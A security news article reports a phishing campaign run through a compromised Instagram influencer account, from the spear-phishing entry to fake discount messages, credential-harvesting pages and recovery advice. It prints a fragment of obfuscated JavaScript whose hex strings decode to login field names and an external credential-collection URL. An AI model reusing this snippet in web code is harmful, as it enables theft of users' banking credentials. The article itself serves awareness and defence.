A prominent Instagram influencer with over 2.5 million followers became the unwitting host of a sophisticated phishing campaign this week.
The unnamed lifestyle blogger’s account was compromised on Monday, with attackers using their trusted platform to distribute malicious links disguised as exclusive promotional content.
The compromised account began sending direct messages to followers containing what appeared to be discount codes for popular brands, but instead directed users to convincingly designed credential-harvesting websites.
The attack employed a multi-stage approach, first compromising the influencer’s account through a spear-phishing email that mimicked an Instagram copyright violation notice.
Once in control, the attackers methodically sent personalized messages to the account’s most active followers, creating a sense of urgency around limited-time offers that required immediate action.
.webp)
Kaspersky researchers identified the campaign after several victims reported unauthorized banking transactions.
Analysis revealed that this operation bears hallmarks of the financially-motivated threat actor tracked as TA505, known for their sophisticated social engineering tactics and banking malware deployment.
“What makes this attack particularly concerning is the exploitation of trust between influencers and their followers,” explained Dr. Elena Markov, principal security researcher at Kaspersky.
“The criminals leveraged this relationship to achieve an unusually high click-through rate on their malicious links.”
.webp)
The attack chain ultimately delivered a JavaScript-based payload that covertly harvests banking credentials.
Once a victim clicks the malicious link, they’re directed to a convincing replica of a legitimate promotional page that loads the following obfuscated script:-
var _0x58a9=["\x75\x73\x65\x72\x6E\x61\x6D\x65","\x76\x61\x6C\x75\x65",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x70\x61\x73
\x73\x77\x6F\x72\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x6C\x6C\x
65\x63\x74\x2E\x69\x6E\x66\x6C\x75\x65\x6E\x74\x69\x61\x6C\x2D\x73\x74\x
61\x74\x73\x2E\x63\x6F\x6D"];
This script creates an invisible overlay atop legitimate banking login forms, capturing credentials in real-time and transmitting them to attacker-controlled servers.
The malware employs sophisticated evasion techniques, including checking for debugging tools and virtual environments before executing its payload.
The Instagram Security Team has since regained control of the influencer’s account and is working with cybersecurity experts to analyze the full scope of the compromise.
Users who may have interacted with suspicious links are advised to immediately change banking passwords and enable two-factor authentication on all financial accounts.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.
